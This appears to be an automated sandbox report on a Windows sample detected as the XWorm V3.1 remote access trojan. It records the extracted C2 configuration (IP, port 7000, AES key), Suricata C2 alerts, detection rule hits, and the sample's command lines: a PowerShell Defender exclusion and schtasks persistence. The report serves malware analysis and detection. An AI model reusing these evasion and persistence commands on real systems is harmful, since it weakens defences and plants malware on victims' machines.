
Windows Analysis Report
9758xBqgE1azKnB.exe

Overview

General Information

Sample name: 9758xBqgE1azKnB.exe
Analysis ID: 1562040
MD5: bf7866489443a237806a4d3d5701cdf3
SHA1: ffbe2847590e876892b41585784b40144c224160
SHA256: 1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095
Tags: exe, user-lontze7

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 9758xBqgE1azKnB.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • powershell.exe (PID: 5500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2516 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1364 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • 9758xBqgE1azKnB.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
      • WerFault.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • grjujyNaBLaKbU.exe (PID: 888 cmdline: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 7340 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • grjujyNaBLaKbU.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • grjujyNaBLaKbU.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • 9758xBqgE1azKnB.exe (PID: 7568 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 7652 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 7700 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • 9758xBqgE1azKnB.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
    • schtasks.exe (PID: 8036 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 9758xBqgE1azKnB.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe" MD5: BF7866489443A237806A4D3D5701CDF3)
  • cleanup
{"C2 url": ["18.181.154.24"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source | Rule | Description | Author
0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x7772:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x780f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x7924:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7420:$cnc4: POST / HTTP/1.1
00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10416:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x194f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x2370a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x104b3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x19593:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x237a7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x105c8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x196a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x238bc:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x100c4:$cnc4: POST / HTTP/1.1
  • 0x191a4:$cnc4: POST / HTTP/1.1
  • 0x233b8:$cnc4: POST / HTTP/1.1
0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(13 entries in this table; the remaining entries are not included in this export)

Source | Rule | Description | Author
8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x5b72:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5c0f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5d24:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5820:$cnc4: POST / HTTP/1.1
0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.9758xBqgE1azKnB.exe.30b13e0.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x5b72:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x5c0f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x5d24:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5820:$cnc4: POST / HTTP/1.1
8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(21 entries in this table; the remaining entries are not included in this export)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ProcessId: 6912, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ProcessId: 6912, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe, ParentImage: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe, ParentProcessId: 888, ParentProcessName: grjujyNaBLaKbU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp", ProcessId: 7340, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", ProcessId: 1364, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe", ProcessId: 5500, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe", ParentImage: C:\Users\user\Desktop\9758xBqgE1azKnB.exe, ParentProcessId: 7128, ParentProcessName: 9758xBqgE1azKnB.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp", ProcessId: 1364, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T06:25:13.034497+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:25:43.034632+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:13.077926+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:43.062445+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:13.042930+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:43.059424+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:28:13.069282+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T06:25:13.034497+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:25:43.034632+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:13.077926+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:26:43.062445+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:13.042930+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:27:43.059424+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP
2024-11-25T06:28:13.069282+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 18.181.154.24 | 7000 | 192.168.2.4 | 49735 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T06:26:18.498577+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 18.181.154.24 | 7000 | TCP


AV Detection

Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["18.181.154.24"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Virustotal: Detection: 54%
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Virustotal: Detection: 54%
Source: 9758xBqgE1azKnB.exe | ReversingLabs: Detection: 57%
Source: 9758xBqgE1azKnB.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe | Joe Sandbox ML: detected
Source: 9758xBqgE1azKnB.exe | Joe Sandbox ML: detected
Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack | String decryptor: 18.181.154.24
Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack | String decryptor: 7000
Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack | String decryptor: <123456789>
Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack | String decryptor: <Xwormmm>
Source: 13.2.grjujyNaBLaKbU.exe.400000.0.unpack | String decryptor: USB.exe
Source: 9758xBqgE1azKnB.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9758xBqgE1azKnB.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\NHwE.pdbpdbHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Windows.Forms.pdbH source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Accessibility.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Core.pdbAccessibility.dll8 source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: \??\C:\Windows\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\NHwE.pdbu source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Configuration.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: o.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: NHwE.pdbSHA256T source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Core.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: n0C:\Windows\mscorlib.pdbj~ source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb% source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000156C000.00000004.00000020.00020000.00000000.sdmp, WER1BE7.tmp.dmp.28.dr
Source: Binary string: NHwE.pdb source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000152A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Drawing.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Management.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: mscorlib.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Management.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.ni.pdb source: WER1BE7.tmp.dmp.28.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Code function: 4x nop then jmp 07854F3Ch (0_2_078547DE)
Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Code function: 4x nop then jmp 081B41CCh (8_2_081B3A6E)
